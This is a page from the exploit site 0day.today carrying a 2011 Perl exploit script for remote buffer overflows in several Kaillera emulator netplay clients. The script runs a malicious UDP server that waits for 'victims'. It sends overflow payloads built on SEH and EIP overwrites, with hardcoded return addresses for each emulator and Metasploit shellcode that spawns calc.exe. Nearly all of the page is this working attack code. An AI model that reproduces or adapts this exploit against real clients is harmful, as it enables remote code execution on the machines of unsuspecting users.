0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Kaillera Multiple Clients Buffer Overflow Vulnerabilities
#!/usr/bin/perl # Exploit Title: Remote Buffer Overflows in Kaillera clients # Date: 6/30/11 # Author: sil3nt_dre4m # Software Link: Multiple: # 1. Kaillera original client: An emulator to download with this client bundled with it is Project64K 0.13: http://www.zophar.net/download_file/1907 # 2. Supraclient 0.85.2 CPPE : This client can be found here: http://morphus56k.110mb.com/website/downloads/SupraclientCPPE_v0.85.2.zip # 3. Open Kaillera p2p client: http://sourceforge.net/projects/okai/files/Client/n02.p2p%20v0/n02.P2P.v0r6.client.v0.5r0.zip/download # Version: Multiple-see below # Tested on: Windows XP, Windows 7 #Introduction: #This script acts as a Kaillera server in order to exploit various Kaillera clients. #Kaillera facilitates playing emulator games over a network. #The Kaillera protocol is built on top of UDP and is mostly documented here: http://www.emulinker.com/index.php?page=Documentation&help=true #Kaillera clients implement this protocol, and many of them have serious vulnerabilities in their code. #This server is capable of exploiting buffer overflows in the following clients: #Exploit tested against Windows 7 and XP machines, gets around ASLR (modules don't have it loaded). #Note: If you wish to exploit the same client twice, you will need to restart the server. #To reproduce the bugs shown here: #1. Download the Kaillera client you wish to test bug on. #2. Download emulator capable of Kaillera netplay, or one which this script targets (Mame32k, and so forth). #3. Overwrite existing kailleraclient.dll with the one you wish to exploit (Supraclient, open kaillera, original client). #4. Look for something that says netplay or Kaillera, and select it. In each emulator its different, for instance in Project64K go to File > Start Netplay. #5. Run this server and connect to the IP its hosted on with the kaillera client. #Greetz to: Blindgeek and jediknight304 for much help with this script, corelanc0d3r for #awesome tutorials on buffer overflows, and Requiem for help with fixing security bugs in Kaillera clients. #DISCLAIMER: I'm not responsible for how you use this code. #By running this code, you agree to accept responsibility for how you use it and you agree to not hold me responsible for any problems arising from running this code. #Final Note: For more information on Kaillera vulnerabilities and remediation information, check out http://kaillerahacks.blogspot.com/. use strict; use warnings; use IO::Socket; use Getopt::Long; use Digest::MD5 qw(md5); use subs qw(sendmessage help); ### Shellcode- spawn calc.exe from Metasploit Framework - ### my $sc = "\x31\xc9\xdd\xc5\xb8\xe6\xd8\x80\xa4\xb1\x33\xd9\x74\x24" . "\xf4\x5a\x31\x42\x16\x83\xea\xfc\x03\x42\xf4\x3a\x75\x58" . "\x10\x33\x76\xa1\xe0\x24\xfe\x44\xd1\x76\x64\x0c\x43\x47" . "\xee\x40\x6f\x2c\xa2\x70\xe4\x40\x6b\x76\x4d\xee\x4d\xb9" . "\x4e\xde\x51\x15\x8c\x40\x2e\x64\xc0\xa2\x0f\xa7\x15\xa2" . "\x48\xda\xd5\xf6\x01\x90\x47\xe7\x26\xe4\x5b\x06\xe9\x62" . "\xe3\x70\x8c\xb5\x97\xca\x8f\xe5\x07\x40\xc7\x1d\x2c\x0e" . "\xf8\x1c\xe1\x4c\xc4\x57\x8e\xa7\xbe\x69\x46\xf6\x3f\x58" . "\xa6\x55\x7e\x54\x2b\xa7\x46\x53\xd3\xd2\xbc\xa7\x6e\xe5" . "\x06\xd5\xb4\x60\x9b\x7d\x3f\xd2\x7f\x7f\xec\x85\xf4\x73" . "\x59\xc1\x53\x90\x5c\x06\xe8\xac\xd5\xa9\x3f\x25\xad\x8d" . "\x9b\x6d\x76\xaf\xba\xcb\xd9\xd0\xdd\xb4\x86\x74\x95\x57" . "\xd3\x0f\xf4\x3d\x22\x9d\x82\x7b\x24\x9d\x8c\x2b\x4c\xac" . "\x07\xa4\x0b\x31\xc2\x80\xe3\x7b\x4f\xa0\x6b\x22\x05\xf0" . "\xf6\xd5\xf3\x37\x0e\x56\xf6\xc7\xf5\x46\x73\xcd\xb2\xc0" . "\x6f\xbf\xab\xa4\x8f\x6c\xcc\xec\xf3\xf3\x5e\x6c\xda\x96" . "\xe6\x17\x22\x53"; ########Variables############## my $adjust ="\x81\xc4\x54\xf2\xff\xff"; # add esp, -3500 adjusts the stack my $ack="\x05\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00"; #ACK packet in Kaillera protocol, see docs my $ServerStatus="\x04" . "\x00" x 9; # No other users shown in server. my $oldjunk="A" x 92; #For exploiting old Kaillera client username BOF. my $junk="A" x 2082; #For exploiting P2P Kaillera client my $suprajunk="A" x 2048; #Supraclient junk my $MOTDHeader="\x17" . "Server\0"; my $MOTDMessage="Hello, Welcome to the Server\0"; my $nseh="\xeb\x06\x90\x90"; #short jmp for SEH exploits my $seh, my $eip; my $ServerExploit; my $username; my %inc; #increments a counter per client connected to us, each time a message is sent my ($port, $ip, $help, $target, $listtarget, $listemu, $emu, $delay, $debug); $port = 27888; GetOptions( 'port=i'=>\$port, 'ip=s' =>\$ip, 'help' =>\$help, 't=s' =>\$target, 'emu=s' =>\$emu, 'targets' =>\$listtarget, 'delay=i' =>\$delay, 'debug' =>\$debug, 'emus' =>\$listemu ); if (defined $listtarget) { print "\r\n=========Pick a version of Kaillera to attack :) ========\r\n\r\n" ; print "1. Kaillera 0.9/Anti3d -t old \r\n\r\nPick emulator to target with -emu flag: mame32k, snes, mupen\r\n\r\n"; print "2. SupraclientCPPE 0.85.2 -t supra:\r\n\r\nPick emulator to target with -emu flag: mame32, mupen\r\n\r\n"; print "3. Open Kaillera n02v0r6 -t p2p (Universal Exploit)\r\n" ; } if (defined $listemu) { print "\r\n=========Specific versions of emulators being attacked :) ============" . "\r\n\r\n" ; print "Mame32k 0.64 -emu mame32k\r\n\r\n"; print "Mame32++ 0.117 -emu mame32\r\n\r\n"; print "Mupen64k 0.7.9 -emu mupen\r\n\r\n"; print "Snes9k 0.09 -emu snes\r\n"; } help() if($help or not defined $ip or not defined $target); #Note: add new targets like this, but make sure to use $variable when redefining, not "my $variablename" or it wont work from earlier scope. #Also, note that target "old" uses SEH-based overflow while target "supra" uses EIP overwrite. if ($target eq "old") { if (not defined $emu) { print "\r\nPick an emulator to target, this exploit isn't universal\r\n"; help(); } if ($emu eq "mame32k") { print "\r\nTargetting Mame32k 0.64 running with Kaillera client 0.9...\r\n"; $seh=pack('V',0x010B3A06); # #pop ebx - pop esi - ret at 0x010B3A06 [mame32k.exe] } elsif ($emu eq "snes") { print "\r\nTargetting Snes9k 0.09 running with Kaillera client 0.9...\r\n"; $seh=pack('V',0x10018ECD); # pop ebx - pop ecx - ret at 0x10018ECD [sdl.dll] } elsif ($emu eq "mupen") { print "\r\nTargetting Mupen64k 0.7.9 running with Kaillera client 0.9...\r\n"; $seh=pack('V', 0x67F46FEF); #pop edi - pop ebp - ret at 0x67F46FEF [mupen64_rsp_hle.dll]. } else { print "\r\nPick a valid emulator to target: -emus to list emulators \r\n"; help(); } } elsif ($target eq "p2p") { print "\r\nTargetting P2P Client (Universal exploit)...\r\n"; if (defined $emu) { print "\r\nUniversal exploit, no emu necessary...\r\n"; help(); } } elsif ($target eq "supra") { if (not defined $emu) { print "\r\nPick an emulator to target, this exploit isn't universal\r\n"; help(); } if ($emu eq "mame32") { print "\r\nTargetting Mame32++ 0.117 running with Supraclient...\r\n"; $eip=pack('V', 0x01C01104); #jmp esp in mameppkgui.exe } elsif ($emu eq "mupen") { print "\r\nTargetting Mupen64k 0.7.9 running with Supraclient...\r\n"; $eip=pack('V', 0x10021C16); #jmp esp at 0x10021C16 [aziaudio.dll] } } else { print "\r\nPick a valid target, try -targets if you're lost.\r\n"; help(); } my $hello = "HELLOD00D$port\0"; #Open a new socket, start an infinite loop receiving messages from clients my $sock = IO::Socket::INET->new(Proto=>'udp', LocalPort=>$port) or die "Error opening $ip:$port \r\n$!"; print "Evil Kaillera Server Started on $ip:$port, waiting for victims :D\r\n"; my $msg_in; my $MAX_MESSAGE_LENGTH=5000; while (1) { $sock->recv($msg_in,$MAX_MESSAGE_LENGTH); my $packet = unpack 'H*', $msg_in; if (defined $debug) { print "Packet found: $packet\n"; } my $peerhost = $sock->peeraddr; my $peerport = $sock->peerport; #Check for client hello, send server hello if ($msg_in =~ m/HELLO0\.83/) { print "Sending Hello...\n"; $sock->send($hello); } #Since we're using an IF loop for username detection, the scope needs to be over everything else, #because local machine processes data faster than incoming network data. #Otherwise, username won't be detected until AFTER ServerAnnouncement is sent and it wont work. if ($msg_in =~ m/\x03(.*?\x00)/){ my $username = $1 ; my $ServerAnnounce="\x02" . $username . substr(md5($username),0,2) . "\x00" x 4 . "\x01"; #Not Complete yet if ($packet=~m/.{10}03/) { if (defined $debug) { print "Username $username found\r\n" . "Sending ACKs to client...\r\n"; } sendpacket(\$sock, $ack) for (1..3); sleep 1; } sendpacket(\$sock, $ServerStatus); print "Sending ServerStatus...\r\n"; sendpacket(\$sock, $ServerAnnounce); if ($target eq "p2p") { print "Attacking p2p client...\r\n"; $eip=pack('V',0x100123F3); # call esp in kailleraclient.dll, universal sendpacket(\$sock, $MOTDHeader.$junk.$eip.$sc); print "Sending MOTD payload to P2PClient...\n"; if (defined $delay) { sleep $delay; } } if ($target eq "supra") { print "Sending MOTD payload to Supraclient\r\n"; sendpacket(\$sock, $MOTDHeader.$suprajunk.$eip.$adjust.$sc); if (defined $delay) { sleep $delay; } } if ($target eq "old") { print "Sending Announce, MOTD to old kaillera client...\r\n"; sendpacket(\$sock, $MOTDHeader.$MOTDMessage); my $ServerExploit="\x02" . $oldjunk . $nseh . $seh . $sc; print "Sending ServerStatus payload to 0.9 client...\r\n"; sendpacket(\$sock, $ServerExploit); if (defined $delay) { sleep $delay; } } } } $sock->close; ########### FUNCTIONS ##################### sub help{ print "\r\nUsage: $0 -port=1111 -ip=1.1.1.1 -t=supra -emu=mame32 -targets -emus -delay 10 -debug -help\n"; exit 0; } #This sendmessage function takes a message and an ip, and sends it nicely - thanks jediknight304 #sendpacket($socket, $message, $anothermessage); sub sendpacket{ my $sock = shift; bless $sock, "IO::Socket::INET"; my @messages = @_; my $numberofmessages = @messages; my $messagesbyte = pack('c',$numberofmessages);#how many messages are in our packet my $packet; for(@messages){ #each client has to have an incrementing packet number my $header = pack('v', $inc{$$sock->peeraddr}++) . pack ('v', length($_)); $packet .= $header.$_; } $$sock->send($messagesbyte.$packet) or die "Couldn't send:\n$packet\n$!"; } # 0day.today [2024-09-29] #